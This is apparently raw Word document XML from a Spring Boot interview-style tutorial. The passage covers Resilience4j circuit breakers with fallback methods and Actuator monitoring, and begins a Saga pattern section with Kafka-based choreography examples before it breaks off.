    <w:p w14:paraId="5607AD4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7F8EDD05" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C2086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CircuitBreaker(name = "myServiceCircuitBreaker", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC9D79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callExternalService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660E38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Simulating a call to a downstream system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06391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restTemplate.getForObject("http://downstream-system/api/data", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA03C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43FF8E88" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0BDBD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Fallback method in case of failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC7D5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allbackMethod(Throwable throwable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60ACE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Fallback response: Downstream service is unavailable.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6B66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5F211B2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141BCA2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n the example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09267D2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CircuitBreaker(name = "myServiceCircuitBreaker"): Applies the circuit breaker defined in application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D06B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allbackMethod = "fallbackMethod": Specifies the method to be invoked when the circuit breaker is open (i.e., when the downstream service is unavailable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718168A"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lastRenderedPageBreak/>
        <w:t>5. Optional: Customizing the Fallback Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32258779"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customize the fallback logic based on the type of exception or response from the downstream system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CAF08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or example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AD83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String fallbackMethod(Throwable throwable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC4A58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f (throwable instanceof SomeSpecificException) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EB15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Specific fallback for some error.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B712B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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325650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Generic fallback message.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BEE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45CD622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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C6822"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6. Monitor the Circuit Breaker State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F73CFF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You can monitor the state of your circuit breakers in the application using Spring Boot Actuator and Resilience4j's integration with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF35F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Add the following dependency for Spring Boot Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7085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y&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98053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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CE261"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lt;artifactId&gt;spring-boot-starter-actuator&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355741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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053497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Now, you can expose the circuit breaker metrics via Spring Actuator endpoints (e.g., /actuator/circuitbreakers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635E2B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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C46B4A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management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D83C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endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430413B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eb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E766CA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exposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70338D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include: health,info,circuitbreakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF964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This will give you detailed information on the state of each circuit breaker, including whether it is open, half-open, or closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F46E78"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7. Test and Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EBB2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inally, test the behavior of your Spring Boot application by simulating failures in the downstream system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F6F1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unit tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to simulate success and failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7477D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integration tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test the circuit breaker mechanism in real-world conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25D0A4"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For example, you can mock the RestTemplate and simulate different scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1E823"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Full Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3684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Here is a simplified example that incorporates the full configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF40BE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io.github.resilience4j.circuitbreaker.annotation.CircuitBreaker;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167ACD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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E3335"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import org.springframework.web.client.RestTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F3566" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D045E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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18175BF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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53307FBA" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A0F0B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rivate final RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F76C4" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BC38B0"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UserService(RestTemplate restTemplate) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7789A"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this.restTemplate = restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A7C6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EC3F1DC" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E22485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CircuitBreaker(name = "userServiceCircuitBreaker", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EB72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etchUserData(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75063DBE"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restTemplate.getForObject("http://external-service/users/" + userId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BA0A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20CEFF9C" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4030CE73"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 Fallback method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CF642"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public String fallbackMethod(String userId, Throwable throwable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E300BB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return "Fallback response: User data is currently unavailable for userId: " + userId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DEE67"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFC27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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2704B317" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A573AFD"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By using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resilience4j's Circuit Breaker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can ensure your Spring Boot application gracefully handles failures in downstream systems and maintains high availability. Key steps include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F009B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46472E86"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Define your </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>circuit breaker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters in the application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D09A0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Use the @CircuitBreaker annotation on service methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1E618"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fallback methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle failures gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5019C"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor the state of circuit breakers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB7DCF" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This setup ensures that even if a downstream system fails, your microservice can still function correctly and handle the failure scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3CCE1"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E73B">
          <v:rect id="_x0000_i2901" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F78A0F" w14:textId="1E25ADEB" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="005452DC" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="703" w:name="_Toc197867917"/>
      <w:r w:rsidRPr="005452DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement Saga design patterns with transitions with multiple different Spring Boot Microservices and explain with examples</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>
    </w:p>
    <w:p w14:paraId="6B8BD243" w14:textId="35E0B68A" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00405862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design pattern used to manage distributed transactions in microservices. It breaks a large transaction into a series of smaller, independent transactions that are coordinated in a way that ensures consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E438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Types of Saga Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441A78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oreography:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Event-based coordination where each service listens for events and publishes its own events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4A7E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Orchestration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A centralized controller (or orchestrator) coordinates the execution of transactions across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A3C2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CC8329">
          <v:rect id="_x0000_i2902" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92B24F"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1. Choreography-Based Saga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF4A3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In this approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E8E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Microservices communicate via </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A59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No central coordinator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7841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ch service emits an event after completing a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70535911"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Example Scenario: E-Commerce Order Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CE4E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ervices:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Order Service, Payment Service, Inventory Service, Notification Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603631FB"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Step-by-Step Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A284FA4"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1: Add Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Include dependencies for Kafka, Spring Boot, and Spring Cloud Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783F7C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3CC680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groupId&gt;org.springframework.kafka&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641CF2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artifactId&gt;spring-kafka&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4A7C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3E95D9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15B4E4C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groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B94EF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lt;artifactId&gt;spring-cloud-starter-stream-kafka&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17BE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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5901E94B"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2: Define Events</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Create a common library for event models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FC75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OrderPlacedEvent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6E964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String orderId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8783B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double amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6167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getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C27E82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2202311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3: Order Service - Publish Event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921B17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2CA317D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OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5C67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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B30F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KafkaTemplate&lt;String, OrderPlacedEvent&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701A7D4" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059049C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placeOrder(String orderId, double amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B485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OrderPlacedEvent event = new OrderPlacedEvent(orderId, amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC3CEE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Template.send("order-events", event);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE674A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316E01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7FA0E5D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4: Payment Service - Listen for Event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E6E7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0B01247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PaymentService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E0195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Listener(topics = "order-events", groupId = "payment-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139A02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processPayment(OrderPlacedEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC11DA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Processing payment for order: " + event.getOrderId());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B7FB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Business logic to deduct payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E4B9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Publish next event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527CD9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5306972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3EE1C50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5: Inventory Service - Chain Reaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765176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2E4223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InventoryService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EE46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KafkaListener(topics = "order-events", groupId = "inventory-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C633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void reserveStock(OrderPlacedEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26DFC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Reserving stock for order: " + event.getOrderId());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106331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Business logic to reserve items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862766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0465D65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51DD926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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46C42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No single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E0B9C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ose coupling between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2542FEE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allenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A8D7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ard to track and debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51BDA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ifficult to manage compensating transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5D56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0A1E0">
          <v:rect id="_x0000_i2903" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538EEE4"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2. Orchestration-Based Saga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431813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In this approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35D88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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
